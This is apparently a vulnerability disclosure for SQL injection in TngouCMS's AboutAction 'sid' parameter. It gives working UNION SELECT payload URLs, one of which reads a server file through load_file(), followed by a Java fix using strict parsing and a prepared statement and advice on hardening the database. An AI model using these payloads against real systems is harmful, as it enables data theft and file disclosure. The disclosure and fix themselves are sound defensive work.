The sid parameter is not strictly filtered in AboutAction.java, which leads to SQL injection:
http://127.0.0.1:8080/TngouCMS/action/about/execute/(-1)union(select(1),(2),(3),(user()),(5),(6),(now()))/
If the MySQL configuration sets secure_file_priv='', we can read any file:
http://127.0.0.1:8080/TngouCMS/action/about/execute/(-1)union(select(1),(2),(3),(select(substr(load_file(0x633a2f2f77696e646f77732f77696e2e696e69),1,30))),(5),(6),(now()))/
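One way to close this class of bug, shown as an added example that is not TngouCMS code: parse the sid path segment as a strict integer and bind it with a PreparedStatement instead of concatenating it into the query. The class, method, table and column names are hypothetical, and the sample inputs in main are constructed.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Optional;
import java.util.regex.Pattern;

public class SidLookup {
    // Accept only a plain decimal id of bounded length (fits in an int).
    private static final Pattern SID = Pattern.compile("[0-9]{1,9}");

    /** Strictly parse the path segment; anything other than digits is rejected. */
    static Optional<Integer> parseSid(String raw) {
        if (raw == null || !SID.matcher(raw).matches()) {
            return Optional.empty();
        }
        return Optional.of(Integer.parseInt(raw));
    }

    /** Hypothetical table and column names; the id is bound, never concatenated. */
    static Optional<String> findTitle(Connection db, String rawSid) throws SQLException {
        Optional<Integer> sid = parseSid(rawSid);
        if (sid.isEmpty()) {
            return Optional.empty(); // caller should answer 400/404 here
        }
        String sql = "SELECT title FROM about WHERE id = ?";
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setInt(1, sid.get());
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? Optional.ofNullable(rs.getString(1)) : Optional.empty();
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal id, the shape of the value reported above, and edge cases.
        String[] samples = {
            "12", "(-1)union(select(1),(2),(3),(user()),(5),(6),(now()))", "-1", "1 or 1=1", ""
        };
        for (String s : samples) {
            System.out.println("[" + s + "] -> "
                + parseSid(s).map(String::valueOf).orElse("rejected"));
        }
    }
}
```

Independently of the code fix, setting secure_file_priv to NULL or a dedicated directory, and not granting the FILE privilege to the application's database account, limits what load_file() can reach.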